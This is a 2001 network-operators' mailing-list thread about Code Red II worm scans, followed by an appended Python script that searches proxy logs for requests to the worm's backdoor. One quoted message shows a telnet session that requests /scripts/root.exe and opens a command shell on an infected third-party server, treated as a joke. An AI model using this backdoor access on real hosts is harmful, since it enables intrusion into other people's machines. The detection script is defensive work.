489 here. Same ISP. I suppose a lot of IPs in our class A are infected?

At 12:59 6/08/2001 +1200, Juha Saarinen wrote:
431 attempts so far.
Is there anything ISPs (Paradise in my case) could do to filter out the damned thing?
--
Juha
:: -----Original Message-----
:: From: owner-nznog(a)list.waikato.ac.nz
:: [mailto:owner-nznog(a)list.waikato.ac.nz] On Behalf Of
:: mat(a)voyager.co.nz
:: Sent: Monday, 6 August 2001 12:52
:: To: nznog(a)list.waikato.ac.nz
:: Subject: Re: Different Code Red?
::
::
:: Hi all
::
:: I have looked on our router and am seeing up to 100 attempts per minute from
:: Code Red Vers. II virus scanning our network looking for other machines to
:: infect.
::
:: Is anyone else seeing such a high scan rate?
::
:: Can anything be done about it?
::
:: Over the last 3 hours, the frequency of attempts increased by 50%.
::
::
:: At 11:46 PM 05/08/2001 +1200, Chris Wedgwood wrote:
:: >On Sun, Aug 05, 2001 at 11:39:27PM +1200, Perry Lorier wrote:
:: >
:: >    It's a new worm using the same infection vector. It is a lot more
:: >    aggressive, and uses the fact that machines near to itself are
:: >    likely to be good places to find crackable machines. If you have
:: >    a lot of customers with cracked NT boxes you'll get a lot of
:: >    scans. If you have a nice C space in the middle of nowhere with
:: >    no windows machines anywhere near, you might have a rather boring
:: >    night.
:: >
:: >Hey, and it leaves a cool backdoor floating about. Look for recent
:: >infectors and telnet to them like such:
:: >
:: >cw:0(a)weta(cw)$ telnet x.x.x.x 80
:: >Trying x.x.x.x...
:: >Connected to x.x.x.x.
:: >Escape character is '^]'.
:: >get /scripts/root.exe HTTP/0.9
:: >
:: >HTTP/1.1 200 OK
:: >Server: Microsoft-IIS/5.0
:: >Date: Sun, 05 Aug 2001 11:39:46 GMT
:: >Content-Type: application/octet-stream
:: >Microsoft Windows 2000 [Version 5.00.2195]
:: >(C) Copyright 1985-1999 Microsoft Corp.
:: >
:: >c:\inetpub\scripts>
:: >
:: >
:: >
:: >Cool :)
:: >
:: >Start grepping those proxy logs people for lusers attempting to do
:: >this (it won't work via a proxy anyhow, but that's no reason not to
:: >hunt down the offending luser and beat them senseless).
:: >
:: >
:: >  --cw
:: >---------
:: >To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz
:: >where the body of your message reads:
:: >unsubscribe nznog
:: >
:: >
:: Matt Law
:: Network Engineer
:: Voyager NZ Ltd
:: DDI +649 4439 443
:: PGP Public Key available http://www.voyager.co.nz/~mat/public-key.asc
:: ---------
:: To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz
:: where the body of your message reads:
:: unsubscribe nznog
::
::
---------
To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz
where the body of your message reads:
unsubscribe nznog
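
The proxy-log search suggested in the quoted message, as an added example that is not part of the original thread: it scans access-log lines for requests to /scripts/root.exe and groups them by requesting client. The Common Log Format layout, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Assumed layout (Common Log Format):
#   client ident user [time] "METHOD URL [PROTO]" status bytes
CLF = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) ([^\s"]+)(?: [^"]*)?" (\d{3}) \S+'
)
BACKDOOR_PATH = "/scripts/root.exe"  # the path shown in the thread

def backdoor_requests(lines):
    """Map each client to its (time, target host, status) root.exe requests."""
    hits = defaultdict(list)
    for line in lines:
        m = CLF.match(line)
        if m is None:
            continue  # not a CLF line; ignore rather than guess
        client, when, _method, url, status = m.groups()
        try:
            parts = urlsplit(url)
        except ValueError:
            continue  # malformed URL in the log line
        # Decode %xx escapes and fold case before comparing, because IIS
        # treats paths case-insensitively and a literal match is easy to miss.
        if unquote(parts.path).lower() == BACKDOOR_PATH:
            hits[client].append((when, parts.hostname or "-", int(status)))
    return dict(hits)

# Constructed sample lines (RFC 1918 clients, documentation-range targets).
SAMPLE = [
    '10.1.1.23 - - [06/Aug/2001:12:40:01 +1200] '
    '"GET http://192.0.2.10/scripts/root.exe HTTP/1.0" 200 512',
    '10.1.1.23 - - [06/Aug/2001:12:40:09 +1200] '
    '"GET http://198.51.100.7/SCRIPTS/%72oot.exe HTTP/1.0" 404 0',
    '10.1.1.40 - - [06/Aug/2001:12:41:00 +1200] '
    '"GET http://www.example.org/index.html HTTP/1.0" 200 2048',
    '10.1.1.77 - - [06/Aug/2001:12:42:30 +1200] '
    '"get http://192.0.2.10/scripts/root.exe HTTP/0.9" 200 512',
    'not a log line',
]

if __name__ == "__main__":
    for client, reqs in sorted(backdoor_requests(SAMPLE).items()):
        targets = sorted({host for _, host, _ in reqs})
        print(f"{client}: {len(reqs)} request(s) to {', '.join(targets)}")
```

Clients that appear in the result are internal machines whose users or software requested the backdoor path on someone else's server; the target hosts they name are likely infected and worth reporting to their operators.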